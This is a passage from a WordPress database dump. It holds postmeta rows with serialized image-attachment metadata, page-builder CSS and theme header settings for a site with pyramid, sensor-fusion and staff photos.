";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30722,3663,'_wp_attachment_backup_sizes','a:8:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1462;s:6:\"height\";i:750;s:4:\"file\";s:25:\"egyptian-pyramids_m-3.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6775;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-3-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11089;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-3-768x394.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62265;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_m-3-1024x525.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104418;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-3-500x256.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27872;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-3-800x410.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67078;}s:11:\"awb_lg-orig\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_m-3-1280x657.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156467;}}'),
(30723,4002,'_wpb_shortcodes_custom_css','.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680400393668{margin-top: 125px !important;}.vc_custom_1680400301732{margin-top: 50px !important;}.vc_custom_1680400344244{margin-top: 95px !important;}.vc_custom_1680400550419{margin-top: 125px !important;}.vc_custom_1680400702580{margin-top: 50px !important;}.vc_custom_1680400628059{margin-top: 95px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(30724,3662,'_wp_attachment_backup_sizes','a:24:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1462;s:6:\"height\";i:750;s:4:\"file\";s:25:\"egyptian-pyramids_m-2.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6775;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-2-300x154.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11089;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-2-768x394.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62265;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_m-2-1024x525.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104418;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-2-500x256.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27872;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:33:\"egyptian-pyramids_m-2-800x410.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67078;}s:11:\"awb_lg-orig\";a:5:{s:4:\"file\";s:34:\"egyptian-pyramids_m-2-1280x657.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:657;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:156467;}s:18:\"full-1686753313609\";a:3:{s:5:\"width\";i:1462;s:6:\"height\";i:529;s:4:\"file\";s:40:\"egyptian-pyramids_m-2-e1680403450249.jpg\";}s:23:\"thumbnail-1686753313609\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1680403450249-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8103;}s:20:\"medium-1686753313609\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1680403450249-300x109.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9389;}s:26:\"medium_large-1686753313609\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1680403450249-768x278.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:278;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50177;}s:19:\"large-1686753313609\";a:5:{s:4:\"file\";s:49:\"egyptian-pyramids_m-2-e1680403450249-1024x371.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:371;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83122;}s:20:\"awb_sm-1686753313609\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1680403450249-500x181.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:181;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23349;}s:20:\"awb_md-1686753313609\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1680403450249-800x289.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54179;}s:20:\"awb_lg-1686753313609\";a:5:{s:4:\"file\";s:49:\"egyptian-pyramids_m-2-e1680403450249-1280x463.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120562;}s:18:\"full-1686753439214\";a:3:{s:5:\"width\";i:1462;s:6:\"height\";i:434;s:4:\"file\";s:40:\"egyptian-pyramids_m-2-e1686753313609.jpg\";}s:23:\"thumbnail-1686753439214\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1686753313609-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7737;}s:20:\"medium-1686753439214\";a:5:{s:4:\"file\";s:47:\"egyptian-pyramids_m-2-e1686753313609-300x89.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7624;}s:26:\"medium_large-1686753439214\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1686753313609-768x228.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:228;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37676;}s:19:\"large-1686753439214\";a:5:{s:4:\"file\";s:49:\"egyptian-pyramids_m-2-e1686753313609-1024x304.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:304;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59584;}s:20:\"awb_sm-1686753439214\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1686753313609-500x148.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18219;}s:20:\"awb_md-1686753439214\";a:5:{s:4:\"file\";s:48:\"egyptian-pyramids_m-2-e1686753313609-800x237.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:237;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40078;}s:20:\"awb_lg-1686753439214\";a:5:{s:4:\"file\";s:49:\"egyptian-pyramids_m-2-e1686753313609-1280x380.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88118;}}'),
(30725,4010,'_edit_lock','1692221620:1'),
(30726,4011,'_wp_attached_file','2023/04/What-is-Sensor-Fusion-1-1024x538-1.png'),
(30727,4011,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:538;s:4:\"file\";s:46:\"2023/04/What-is-Sensor-Fusion-1-1024x538-1.png\";s:8:\"filesize\";i:812669;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"What-is-Sensor-Fusion-1-1024x538-1-300x158.png\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:92306;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"What-is-Sensor-Fusion-1-1024x538-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46905;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"What-is-Sensor-Fusion-1-1024x538-1-768x404.png\";s:5:\"width\";i:768;s:6:\"height\";i:404;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:517611;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:46:\"What-is-Sensor-Fusion-1-1024x538-1-500x263.png\";s:5:\"width\";i:500;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:236130;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:46:\"What-is-Sensor-Fusion-1-1024x538-1-800x420.png\";s:5:\"width\";i:800;s:6:\"height\";i:420;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:553201;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30728,4010,'_thumbnail_id','4011'),
(30729,4010,'_edit_last','1'),
(30730,4010,'_wpb_vc_js_status','true'),
(30731,4010,'_dt_sidebar_position','disabled'),
(30732,4010,'_dt_sidebar_widgetarea_id','sidebar_1'),
(30733,4010,'_dt_sidebar_hide_on_mobile','0'),
(30734,4010,'_dt_footer_show','0'),
(30735,4010,'_dt_footer_widgetarea_id','sidebar_2'),
(30736,4010,'_dt_footer_hide_on_mobile','0'),
(30737,4010,'_dt_header_title','fancy'),
(30738,4010,'_dt_header_background','normal'),
(30739,4010,'_dt_header_background_below_slideshow','disabled'),
(30740,4010,'_dt_header_transparent_bg_color_scheme','light'),
(30741,4010,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(30742,4010,'_dt_header_transparent_top_bar_bg_opacity','25'),
(30743,4010,'_dt_header_transparent_bg_color','#000000'),
(30744,4010,'_dt_header_transparent_bg_opacity','50'),
(30745,4010,'_dt_header_disabled_background','normal'),
(30746,4010,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(30747,4010,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(30748,4010,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(30749,4010,'_dt_header_disabled_transparent_bg_color','#000000'),
(30750,4010,'_dt_header_disabled_transparent_bg_opacity','50'),
(30751,4010,'_dt_page_overrides_top_margin',''),
(30752,4010,'_dt_page_overrides_right_margin',''),
(30753,4010,'_dt_page_overrides_bottom_margin',''),
(30754,4010,'_dt_page_overrides_left_margin',''),
(30755,4010,'_dt_mobile_page_padding_top',''),
(30756,4010,'_dt_mobile_page_padding_right',''),
(30757,4010,'_dt_mobile_page_padding_bottom',''),
(30758,4010,'_dt_mobile_page_padding_left',''),
(30759,4010,'_dt_fancy_header_layout_heading',''),
(30760,4010,'_dt_fancy_header_title_aligment','center'),
(30761,4010,'_dt_fancy_header_height','300'),
(30762,4010,'_dt_fancy_header_padding-top','0px'),
(30763,4010,'_dt_fancy_header_padding-bottom','0px'),
(30764,4010,'_dt_fancy_header_breadcrumbs_heading',''),
(30765,4010,'_dt_fancy_header_breadcrumbs','disabled'),
(30766,4010,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(30767,4010,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(30768,4010,'_dt_fancy_header_title_heading',''),
(30769,4010,'_dt_fancy_header_title_mode','generic'),
(30770,4010,'_dt_fancy_header_title',''),
(30771,4010,'_dt_fancy_header_title_font_size','30'),
(30772,4010,'_dt_fancy_header_title_line_height','36'),
(30773,4010,'_dt_fancy_header_text_transform','none'),
(30774,4010,'_dt_fancy_header_title_color_mode','color'),
(30775,4010,'_dt_fancy_header_title_color','#ffffff'),
(30776,4010,'_dt_fancy_header_subtitle_heading',''),
(30777,4010,'_dt_fancy_header_subtitle',''),
(30778,4010,'_dt_fancy_header_subtitle_font_size','18'),
(30779,4010,'_dt_fancy_header_subtitle_line_height','26'),
(30780,4010,'_dt_fancy_header_subtitle_text_transform','none'),
(30781,4010,'_dt_fancy_header_subtitle_color_mode','color'),
(30782,4010,'_dt_fancy_header_subtitle_color','#ffffff'),
(30783,4010,'_dt_fancy_header_bg_heading',''),
(30784,4010,'_dt_fancy_header_bg_color','#222222'),
(30785,4010,'_dt_fancy_header_bg_image_origin','custom'),
(30786,4010,'_dt_fancy_header_bg_image','a:0:{}'),
(30787,4010,'_dt_fancy_header_bg_repeat','no-repeat'),
(30788,4010,'_dt_fancy_header_bg_position_x','center'),
(30789,4010,'_dt_fancy_header_bg_position_y','center'),
(30790,4010,'_dt_fancy_header_bg_fullscreen','1'),
(30791,4010,'_dt_fancy_header_bg_overlay','0'),
(30792,4010,'_dt_fancy_header_overlay_color','#000'),
(30793,4010,'_dt_fancy_header_bg_overlay_opacity','50'),
(30794,4010,'_dt_fancy_header_scroll_effect','default'),
(30795,4010,'_dt_fancy_header_bg_parallax','0.5'),
(30796,4010,'_dt_fancy_header_responsiveness_heading',''),
(30797,4010,'_dt_fancy_header_responsiveness','disabled'),
(30798,4010,'_dt_fancy_header_responsiveness_switch','778px'),
(30799,4010,'_dt_fancy_header_responsive_height','70'),
(30800,4010,'_dt_fancy_header_responsive_font_size','30'),
(30801,4010,'_dt_fancy_header_responsive_title_line_height','38'),
(30802,4010,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(30803,4010,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(30804,4010,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(30805,4010,'_dt_project_options_back_button',''),
(30806,4010,'_dt_project_options_show_link','0'),
(30807,4010,'_dt_project_options_link',''),
(30808,4010,'_dt_project_options_link_target',''),
(30809,4010,'_dt_project_options_link_name',''),
(30810,4010,'_dt_project_options_hide_thumbnail','1'),
(30811,4010,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(30812,4010,'_dt_project_options_related_mode','custom'),
(30813,4010,'_dt_project_options_preview','normal'),
(30814,4010,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(30815,4024,'_edit_lock','1680418938:1'),
(30816,4025,'_wp_attached_file','2023/04/dr-nashwa-e1680418799393.jpg'),
(30817,4025,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:129;s:6:\"height\";i:194;s:4:\"file\";s:36:\"2023/04/dr-nashwa-e1680418799393.jpg\";s:8:\"filesize\";i:21471;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"dr-nashwa-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2448;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"dr-nashwa-1024x605.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:605;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15112;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"dr-nashwa-e1680418799393-129x150.jpg\";s:5:\"width\";i:129;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5244;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"dr-nashwa-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9286;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"dr-nashwa-500x295.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:295;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4709;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"dr-nashwa-800x473.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9811;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30818,4025,'_wp_attachment_backup_sizes','a:7:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1100;s:6:\"height\";i:650;s:4:\"file\";s:13:\"dr-nashwa.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:21:\"dr-nashwa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1089;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:21:\"dr-nashwa-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2448;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:21:\"dr-nashwa-768x454.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9286;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:22:\"dr-nashwa-1024x605.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:605;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15112;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:21:\"dr-nashwa-500x295.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:295;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4709;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:21:\"dr-nashwa-800x473.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9811;}}'),
(30819,4026,'_wp_attached_file','2023/04/dr-nashwa-1.jpg'),
(30820,4026,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:127;s:6:\"height\";i:191;s:4:\"file\";s:23:\"2023/04/dr-nashwa-1.jpg\";s:8:\"filesize\";i:9635;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"dr-nashwa-1-127x150.jpg\";s:5:\"width\";i:127;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5231;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(30821,4024,'_thumbnail_id','4026'),
(30822,4024,'_edit_last','1'),
(30823,4024,'_dt_sidebar_position','disabled'),
(30824,4024,'_dt_sidebar_widgetarea_id','sidebar_1'),
(30825,4024,'_dt_sidebar_hide_on_mobile','0'),
(30826,4024,'_dt_footer_show','1'),
(30827,4024,'_dt_footer_widgetarea_id','sidebar_2'),
(30828,4024,'_dt_footer_hide_on_mobile','0'),
(30829,4024,'_dt_header_title','fancy'),
(30830,4024,'_dt_header_background','normal'),
(30831,4024,'_dt_header_background_below_slideshow','disabled'),
(30832,4024,'_dt_header_transparent_bg_color_scheme','light'),
(30833,4024,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(30834,4024,'_dt_header_transparent_top_bar_bg_opacity','25'),
(30835,4024,'_dt_header_transparent_bg_color','#000000'),
(30836,4024,'_dt_header_transparent_bg_opacity','50'),
(30837,4024,'_dt_header_disabled_background','normal'),
(30838,4024,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(30839,4024,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(30840,4024,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(30841,4024,'_dt_header_disabled_transparent_bg_color','#000000'),
(30842,4024,'_dt_header_disabled_transparent_bg_opacity','50'),
(30843,4024,'_dt_page_overrides_top_margin',''),
(30844,4024,'_dt_page_overrides_right_margin',''),
(30845,4024,'_dt_page_overrides_bottom_margin',''),
(30846,4024,'_dt_page_overrides_left_margin',''),
(30847,4024,'_dt_mobile_page_padding_top',''),
(30848,4024,'_dt_mobile_page_padding_right',''),
(30849,4024,'_dt_mobile_page_padding_bottom',''),
(30850,4024,'_dt_mobile_page_padding_left',''),
(30851,4024,'_dt_fancy_header_layout_heading',''),
(30852,4024,'_dt_fancy_header_title_aligment','center'),
(30853,4024,'_dt_fancy_header_height','300'),
(30854,4024,'_dt_fancy_header_padding-top','0px'),
(30855,4024,'_dt_fancy_header_padding-bottom','0px'),
(30856,4024,'_dt_fancy_header_breadcrumbs_heading',''),
(30857,4024,'_dt_fancy_header_breadcrumbs','disabled'),
(30858,4024,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(30859,4024,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(30860,4024,'_dt_fancy_header_title_heading',''),
(30861,4024,'_dt_fancy_header_title_mode','generic'),
(30862,4024,'_dt_fancy_header_title',''),
(30863,4024,'_dt_fancy_header_title_font_size','30'),
(30864,4024,'_dt_fancy_header_title_line_height','36'),
(30865,4024,'_dt_fancy_header_text_transform','none'),
(30866,4024,'_dt_fancy_header_title_color_mode','color'),
(30867,4024,'_dt_fancy_header_title_color','#ffffff'),
(30868,4024,'_dt_fancy_header_subtitle_heading',''),
(30869,4024,'_dt_fancy_header_subtitle',''),
(30870,4024,'_dt_fancy_header_subtitle_font_size','18'),
(30871,4024,'_dt_fancy_header_subtitle_line_height','26'),
(30872,4024,'_dt_fancy_header_subtitle_text_transform','none'),
(30873,4024,'_dt_fancy_header_subtitle_color_mode','color'),
(30874,4024,'_dt_fancy_header_subtitle_color','#ffffff'),
(30875,4024,'_dt_fancy_header_bg_heading',''),
(30876,4024,'_dt_fancy_header_bg_color','#222222'),
(30877,4024,'_dt_fancy_header_bg_image_origin','custom'),
(30878,4024,'_dt_fancy_header_bg_image','a:0:{}'),
(30879,4024,'_dt_fancy_header_bg_repeat','no-repeat'),
(30880,4024,'_dt_fancy_header_bg_position_x','center'),
(30881,4024,'_dt_fancy_header_bg_position_y','center'),
(30882,4024,'_dt_fancy_header_bg_fullscreen','1'),
(30883,4024,'_dt_fancy_header_bg_overlay','0'),
(30884,4024,'_dt_fancy_header_overlay_color','#000'),
(30885,4024,'_dt_fancy_header_bg_overlay_opacity','50'),
(30886,4024,'_dt_fancy_header_scroll_effect','default'),
(30887,4024,'_dt_fancy_header_bg_parallax','0.5'),
(30888,4024,'_dt_fancy_header_responsiveness_heading',''),
(30889,4024,'_dt_fancy_header_responsiveness','enabled'),
(30890,4024,'_dt_fancy_header_responsiveness_switch','778px'),
(30891,4024,'_dt_fancy_header_responsive_height','70'),
(30892,4024,'_dt_fancy_header_responsive_font_size','30'),
(30893,4024,'_dt_fancy_header_responsive_title_line_height','38'),
(30894,4024,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(30895,4024,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(30896,4024,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(30897,4024,'_dt_teammate_options_go_to_single','1'),
(30898,4024,'_dt_teammate_options_position',''),
